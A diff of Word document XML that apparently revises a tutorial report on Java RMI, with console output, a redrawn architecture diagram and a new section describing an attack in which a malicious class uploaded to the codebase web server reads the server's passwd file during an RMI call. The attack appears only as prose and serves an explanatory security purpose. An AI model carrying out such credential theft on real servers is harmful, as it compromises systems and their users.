-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
+        <w:pStyle w:val="ConsoleError"/>
+      </w:pPr>
+      <w:r>
         <w:t>…</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>java.rmi.server.RemoteObjectInvocationHandler.invokeRemoteMethod(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>RemoteObjectInvocationHandler.java:194)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="CodeSnippet"/>
+        <w:pStyle w:val="ConsoleError"/>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
         <w:t>Remote job client exception.</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
@@ -7208,10 +7348,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc396784311"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Application in action:</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:p>
       <w:r>
@@ -7327,79 +7469,11 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In this example, the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="keywordsChar"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>ClientSideProgram</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> creates a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="keywordsChar"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>SymmetricEncryption</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> job with message </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>“Hello RMI application”</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, symmetric method SUBSTITU</w:t>
-      </w:r>
-      <w:r>
-        <w:t>T</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ION, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>and encryption key 5. Upon invoking the remote method</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="keywordsChar"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>retrieveJobReport</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, the client passes the job to the server-side and receives the result in the form of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="keywordsChar"/>
-        </w:rPr>
-        <w:t>String</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:pict>
-          <v:group id="_x0000_s1046" style="position:absolute;left:0;text-align:left;margin-left:-9.75pt;margin-top:20.1pt;width:463.5pt;height:229.5pt;z-index:251660288" coordorigin="1380,2520" coordsize="9270,4590">
+          <v:group id="_x0000_s1068" style="position:absolute;left:0;text-align:left;margin-left:-9.75pt;margin-top:90.2pt;width:463.5pt;height:243pt;z-index:251660288" coordorigin="1320,1320" coordsize="9270,4860">
             <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
               <v:stroke joinstyle="miter"/>
               <v:formulas>
@@ -7419,155 +7493,1665 @@
               <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
               <o:lock v:ext="edit" aspectratio="t"/>
             </v:shapetype>
-            <v:shape id="Picture 3" o:spid="_x0000_s1047" type="#_x0000_t75" alt="network.jpg" style="position:absolute;left:5025;top:2520;width:1875;height:1860;visibility:visible">
-              <v:imagedata r:id="rId7" o:title="network"/>
+            <v:shape id="Picture 4" o:spid="_x0000_s1069" type="#_x0000_t75" alt="server-machine.jpg" style="position:absolute;left:1995;top:5010;width:1440;height:1050;visibility:visible">
+              <v:imagedata r:id="rId7" o:title="server-machine"/>
             </v:shape>
-            <v:shape id="Picture 4" o:spid="_x0000_s1048" type="#_x0000_t75" alt="server-machine.jpg" style="position:absolute;left:3990;top:5400;width:1500;height:1710;visibility:visible">
-              <v:imagedata r:id="rId8" o:title="server-machine"/>
+            <v:shape id="Picture 2" o:spid="_x0000_s1070" type="#_x0000_t75" alt="client-machine.jpg" style="position:absolute;left:8010;top:5025;width:1650;height:1155;visibility:visible">
+              <v:imagedata r:id="rId8" o:title="client-machine"/>
             </v:shape>
-            <v:shape id="Picture 2" o:spid="_x0000_s1049" type="#_x0000_t75" alt="client-machine.jpg" style="position:absolute;left:6660;top:5775;width:1275;height:1335;visibility:visible">
-              <v:imagedata r:id="rId9" o:title="client-machine"/>
+            <v:shape id="_x0000_s1071" type="#_x0000_t75" style="position:absolute;left:5670;top:3330;width:840;height:840">
+              <v:imagedata r:id="rId9" o:title="web server"/>
             </v:shape>
-            <v:group id="_x0000_s1050" style="position:absolute;left:1380;top:2926;width:9270;height:3735" coordorigin="1380,2926" coordsize="9270,3735">
-              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                <v:stroke joinstyle="miter"/>
-                <v:path gradientshapeok="t" o:connecttype="rect"/>
-              </v:shapetype>
-              <v:shape id="_x0000_s1051" type="#_x0000_t202" style="position:absolute;left:6792;top:4515;width:2250;height:825">
-                <v:textbox style="mso-next-textbox:#_x0000_s1051">
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:pStyle w:val="NoSpacing"/>
-                      </w:pPr>
-                      <w:proofErr w:type="spellStart"/>
-                      <w:r>
-                        <w:t>ClientSide</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellEnd"/>
-                      <w:r>
-                        <w:t xml:space="preserve"> program</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve"> makes an RMI call to pass a job and retrieve result.</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-              </v:shape>
-              <v:group id="_x0000_s1052" style="position:absolute;left:1380;top:2926;width:9270;height:3735" coordorigin="1380,2926" coordsize="9270,3735">
-                <v:shape id="_x0000_s1053" type="#_x0000_t202" style="position:absolute;left:2640;top:4515;width:2580;height:795">
-                  <v:textbox style="mso-next-textbox:#_x0000_s1053">
-                    <w:txbxContent>
-                      <w:p>
-                        <w:pPr>
-                          <w:pStyle w:val="NoSpacing"/>
-                        </w:pPr>
-                        <w:r>
-                          <w:t>Remote object receives job, carries out required operation and returns result.</w:t>
-                        </w:r>
-                      </w:p>
-                    </w:txbxContent>
-                  </v:textbox>
-                </v:shape>
-                <v:shape id="_x0000_s1054" type="#_x0000_t202" style="position:absolute;left:1380;top:3137;width:2580;height:795">
-                  <v:textbox style="mso-next-textbox:#_x0000_s1054">
-                    <w:txbxContent>
-                      <w:p>
-                        <w:pPr>
-                          <w:pStyle w:val="NoSpacing"/>
-                        </w:pPr>
-                        <w:proofErr w:type="spellStart"/>
-                        <w:r>
-                          <w:t>ServerSide</w:t>
-                        </w:r>
-                        <w:proofErr w:type="spellEnd"/>
-                        <w:r>
-                          <w:t xml:space="preserve"> program</w:t>
-                        </w:r>
-                        <w:r>
-                          <w:rPr>
-                            <w:szCs w:val="18"/>
-                          </w:rPr>
-                          <w:t xml:space="preserve"> generates remote object stub and binds to RMI registry.</w:t>
-                        </w:r>
-                      </w:p>
-                    </w:txbxContent>
-                  </v:textbox>
-                </v:shape>
-                <v:shape id="_x0000_s1055" type="#_x0000_t202" style="position:absolute;left:8010;top:2926;width:2640;height:810">
-                  <v:textbox style="mso-next-textbox:#_x0000_s1055">
-                    <w:txbxContent>
-                      <w:p>
-                        <w:pPr>
-                          <w:pStyle w:val="NoSpacing"/>
-                        </w:pPr>
-                        <w:proofErr w:type="spellStart"/>
-                        <w:r>
-                          <w:t>ClientSide</w:t>
-                        </w:r>
-                        <w:proofErr w:type="spellEnd"/>
-                        <w:r>
-                          <w:t xml:space="preserve"> program </w:t>
-                        </w:r>
-                        <w:r>
-                          <w:t>locates registry retrieves remote object stub.</w:t>
-                        </w:r>
-                      </w:p>
-                    </w:txbxContent>
-                  </v:textbox>
-                </v:shape>
-                <v:shapetype id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
-                  <v:path arrowok="t" fillok="f" o:connecttype="none"/>
-                  <o:lock v:ext="edit" shapetype="t"/>
-                </v:shapetype>
-                <v:shape id="_x0000_s1056" type="#_x0000_t32" style="position:absolute;left:1995;top:3930;width:0;height:2595" o:connectortype="straight"/>
-                <v:shape id="_x0000_s1057" type="#_x0000_t32" style="position:absolute;left:1995;top:6525;width:2055;height:0" o:connectortype="straight"/>
-                <v:shape id="_x0000_s1058" type="#_x0000_t32" style="position:absolute;left:3960;top:3510;width:1110;height:0" o:connectortype="straight">
-                  <v:stroke endarrow="block"/>
-                </v:shape>
-                <v:shape id="_x0000_s1059" type="#_x0000_t32" style="position:absolute;left:10260;top:3736;width:0;height:2924" o:connectortype="straight"/>
-                <v:shape id="_x0000_s1060" type="#_x0000_t32" style="position:absolute;left:6900;top:3435;width:1110;height:0" o:connectortype="straight"/>
-                <v:shape id="_x0000_s1061" type="#_x0000_t32" style="position:absolute;left:7770;top:6661;width:2490;height:0;flip:x" o:connectortype="straight">
-                  <v:stroke endarrow="block"/>
-                </v:shape>
-                <v:shape id="_x0000_s1062" type="#_x0000_t32" style="position:absolute;left:6480;top:3930;width:1140;height:1;flip:x" o:connectortype="straight">
-                  <v:stroke endarrow="block"/>
-                </v:shape>
-                <v:shape id="_x0000_s1063" type="#_x0000_t32" style="position:absolute;left:7620;top:3930;width:0;height:585" o:connectortype="straight"/>
-                <v:shape id="_x0000_s1064" type="#_x0000_t32" style="position:absolute;left:4350;top:5310;width:1;height:1035" o:connectortype="straight">
-                  <v:stroke endarrow="block"/>
-                </v:shape>
-                <v:shape id="_x0000_s1065" type="#_x0000_t32" style="position:absolute;left:4350;top:3932;width:855;height:0" o:connectortype="straight">
-                  <v:stroke endarrow="block"/>
-                </v:shape>
-                <v:shape id="_x0000_s1066" type="#_x0000_t32" style="position:absolute;left:4350;top:3930;width:0;height:585" o:connectortype="straight"/>
-                <v:shape id="_x0000_s1067" type="#_x0000_t32" style="position:absolute;left:7620;top:5340;width:1;height:1080" o:connectortype="straight">
-                  <v:stroke endarrow="block"/>
-                </v:shape>
-              </v:group>
-            </v:group>
+            <v:shapetype id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
+              <v:path arrowok="t" fillok="f" o:connecttype="none"/>
+              <o:lock v:ext="edit" shapetype="t"/>
+            </v:shapetype>
+            <v:shape id="_x0000_s1072" type="#_x0000_t32" style="position:absolute;left:6330;top:4005;width:1965;height:1185;flip:x y" o:connectortype="straight">
+              <v:stroke endarrow="block"/>
+            </v:shape>
+            <v:shape id="_x0000_s1073" type="#_x0000_t32" style="position:absolute;left:3330;top:4065;width:2445;height:1155;flip:x" o:connectortype="straight">
+              <v:stroke endarrow="block"/>
+            </v:shape>
+            <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+              <v:stroke joinstyle="miter"/>
+              <v:path gradientshapeok="t" o:connecttype="rect"/>
+            </v:shapetype>
+            <v:shape id="_x0000_s1074" type="#_x0000_t202" style="position:absolute;left:4065;top:4575;width:3390;height:645">
+              <v:textbox style="mso-next-textbox:#_x0000_s1074" inset="0,0,0,0">
+                <w:txbxContent>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="NoSpacing"/>
+                    </w:pPr>
+                    <w:r>
+                      <w:t xml:space="preserve">Client uploads its class files onto a directory in a web server (e.g. </w:t>
+                    </w:r>
+                    <w:proofErr w:type="spellStart"/>
+                    <w:r>
+                      <w:rPr>
+                        <w:b/>
+                        <w:i/>
+                      </w:rPr>
+                      <w:t>stuweb</w:t>
+                    </w:r>
+                    <w:proofErr w:type="spellEnd"/>
+                    <w:r>
+                      <w:t xml:space="preserve">) which the server references to in </w:t>
+                    </w:r>
+                    <w:proofErr w:type="gramStart"/>
+                    <w:r>
+                      <w:t>its</w:t>
+                    </w:r>
+                    <w:proofErr w:type="gramEnd"/>
+                    <w:r>
+                      <w:t xml:space="preserve"> codebase feature.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:txbxContent>
+              </v:textbox>
+            </v:shape>
+            <v:shape id="Picture 3" o:spid="_x0000_s1075" type="#_x0000_t75" alt="network.jpg" style="position:absolute;left:4965;top:1320;width:1875;height:1860;visibility:visible">
+              <v:imagedata r:id="rId10" o:title="network"/>
+            </v:shape>
+            <v:shape id="_x0000_s1076" type="#_x0000_t202" style="position:absolute;left:7377;top:3180;width:2250;height:825">
+              <v:textbox style="mso-next-textbox:#_x0000_s1076">
+                <w:txbxContent>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="NoSpacing"/>
+                    </w:pPr>
+                    <w:r>
+                      <w:t>Client</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t>-</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t>Side</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t xml:space="preserve"> program</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t xml:space="preserve"> makes RMI call to pass a job and retrieve result.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:txbxContent>
+              </v:textbox>
+            </v:shape>
+            <v:shape id="_x0000_s1077" type="#_x0000_t202" style="position:absolute;left:2115;top:3195;width:2580;height:795">
+              <v:textbox style="mso-next-textbox:#_x0000_s1077">
+                <w:txbxContent>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="NoSpacing"/>
+                    </w:pPr>
+                    <w:r>
+                      <w:t>Remote object receives job, carries out required operation and returns result.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:txbxContent>
+              </v:textbox>
+            </v:shape>
+            <v:shape id="_x0000_s1078" type="#_x0000_t202" style="position:absolute;left:1320;top:1802;width:2580;height:795">
+              <v:textbox style="mso-next-textbox:#_x0000_s1078">
+                <w:txbxContent>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="NoSpacing"/>
+                    </w:pPr>
+                    <w:r>
+                      <w:t>Server</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t>-</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t>Side program</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t xml:space="preserve"> generates remote object stub and binds to RMI registry.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:txbxContent>
+              </v:textbox>
+            </v:shape>
+            <v:shape id="_x0000_s1079" type="#_x0000_t202" style="position:absolute;left:7950;top:1696;width:2640;height:810">
+              <v:textbox style="mso-next-textbox:#_x0000_s1079">
+                <w:txbxContent>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="NoSpacing"/>
+                    </w:pPr>
+                    <w:r>
+                      <w:t>Client</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t>-</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t>Side</w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t xml:space="preserve"> program </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:t>locates registry retrieves remote object stub.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:txbxContent>
+              </v:textbox>
+            </v:shape>
+            <v:shape id="_x0000_s1080" type="#_x0000_t32" style="position:absolute;left:1935;top:2595;width:0;height:2895" o:connectortype="straight"/>
+            <v:shape id="_x0000_s1081" type="#_x0000_t32" style="position:absolute;left:1935;top:5490;width:660;height:1" o:connectortype="straight"/>
+            <v:shape id="_x0000_s1082" type="#_x0000_t32" style="position:absolute;left:3900;top:2175;width:1110;height:0" o:connectortype="straight">
+              <v:stroke endarrow="block"/>
+            </v:shape>
+            <v:shape id="_x0000_s1083" type="#_x0000_t32" style="position:absolute;left:10200;top:2506;width:1;height:2984" o:connectortype="straight"/>
+            <v:shape id="_x0000_s1084" type="#_x0000_t32" style="position:absolute;left:6690;top:2100;width:1260;height:1" o:connectortype="straight"/>
+            <v:shape id="_x0000_s1085" type="#_x0000_t32" style="position:absolute;left:9045;top:5490;width:1155;height:1;flip:x" o:connectortype="straight">
+              <v:stroke endarrow="block"/>
+            </v:shape>
+            <v:shape id="_x0000_s1086" type="#_x0000_t32" style="position:absolute;left:6330;top:2806;width:2341;height:0;flip:x" o:connectortype="straight">
+              <v:stroke endarrow="block"/>
+            </v:shape>
+            <v:shape id="_x0000_s1087" type="#_x0000_t32" style="position:absolute;left:8670;top:2805;width:2;height:390" o:connectortype="straight"/>
+            <v:shape id="_x0000_s1088" type="#_x0000_t32" style="position:absolute;left:2789;top:3990;width:1;height:1035" o:connectortype="straight">
+              <v:stroke endarrow="block"/>
+            </v:shape>
+            <v:shape id="_x0000_s1089" type="#_x0000_t32" style="position:absolute;left:2789;top:2805;width:2551;height:0" o:connectortype="straight">
+              <v:stroke endarrow="block"/>
+            </v:shape>
+            <v:shape id="_x0000_s1090" type="#_x0000_t32" style="position:absolute;left:2776;top:2805;width:0;height:390" o:connectortype="straight"/>
+            <v:shape id="_x0000_s1091" type="#_x0000_t32" style="position:absolute;left:8670;top:4005;width:1;height:1080" o:connectortype="straight">
+              <v:stroke endarrow="block"/>
+            </v:shape>
             <w10:wrap type="topAndBottom"/>
           </v:group>
         </w:pict>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The result of the </w:t>
+      <w:r>
+        <w:t>In this example, the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="keywordsChar"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>ClientSideProgram</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> creates a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="keywordsChar"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>SymmetricEncryption</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> job with message </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>“Hello RMI application”</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, symmetric method SUBSTITU</w:t>
+      </w:r>
+      <w:r>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ION, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>and encryption key 5. Upon invoking the remote method</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="keywordsChar"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>retrieveJobReport</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, the client passes the job to the server-side and receives the result in the form of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="keywordsChar"/>
+        </w:rPr>
+        <w:t>String</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
+      <w:r>
+        <w:t>As the client application is run, the server-side console outputs:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Server side received a remote job from client machine: 192.168.0.7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The job is being carried out on server machine: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mahabuburs-mbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/192.168.0.5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>On the client-side, t</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">he </w:t>
+      </w:r>
+      <w:r>
+        <w:t>console displays the result and outputs:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Client side:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Original message: Hello RMI application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Encrypted mess</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>ge: Mjqqt%WRN%fuuqnhfynts3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ConsoleOutput"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The job was executed in machine: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>mahabuburs-mbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>/192.168.0.5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc396784312"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Attack through </w:t>
+      </w:r>
+      <w:r>
+        <w:t>impersonating</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a client</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>We presume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that an attacker gains access to the directory in the web server</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+        </w:rPr>
+        <w:t>stuweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in this example)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> where the RMI service looks into for reference to client classes.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">attacker then creates an evil version of the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="keywordsChar"/>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>SymmetricEncryption</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">job; let us call this class </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="keywordsChar"/>
+        </w:rPr>
+        <w:t>SymmetricEncryptionEvil</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. The class contain</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> malicious code which</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, outside of doing </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">normal </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">symmetric encryption </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">operation, will try to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">steal </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">password information from the server machine by reading the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Once the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>evil</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>class</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is updated on the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+        </w:rPr>
+        <w:t>stuweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> web server, t</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">he attacker </w:t>
+      </w:r>
+      <w:r>
+        <w:t>impersonates a legitimate client</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to create a job with the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>class</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and makes an RMI call. Th</w:t>
+      </w:r>
+      <w:r>
+        <w:t>is</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> RMI call passes the job to the server-side, executes the operation</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with the malicious code and the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>stolen data</w:t>
